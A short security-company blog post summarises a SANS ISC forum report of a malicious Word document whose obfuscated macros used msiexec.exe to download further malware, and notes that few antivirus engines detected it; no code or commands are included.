A thread on the SANS ISC InfoSec forum described yet another infection case – and one detected by only a few antivirus programs! This is a very good result from the perspective of the attacker. This was especially so in that, according to VirusTotal, the software that detected the malicious file was not one developed by the most renowned companies. Unfortunately, there is no information as to which engines were the first to identify the malicious code.
Macro obfuscation in the Windows installer
The technique applied by the attackers was macro-obfuscation (code obfuscation) in a Word document. Analysis of the deobfuscated code showed that the attackers exploited the ‘msiexec.exe’ Windows installer. Its objective was to download a file from an indicated website. Next, the downloaded file communicated with another HTTP address. Effects – injecting a malicious code onto a victim’s computer. You can add the rest yourselves….
A detailed description of the file can be found in the link below.
To end with – please pay attention to one more fact. Not only the top antivirus software is able to effectively indicate the malicious files.
Source: SANS ISC InfoSec
—
Do you need cybersecurity solutions for your company – then contact us.
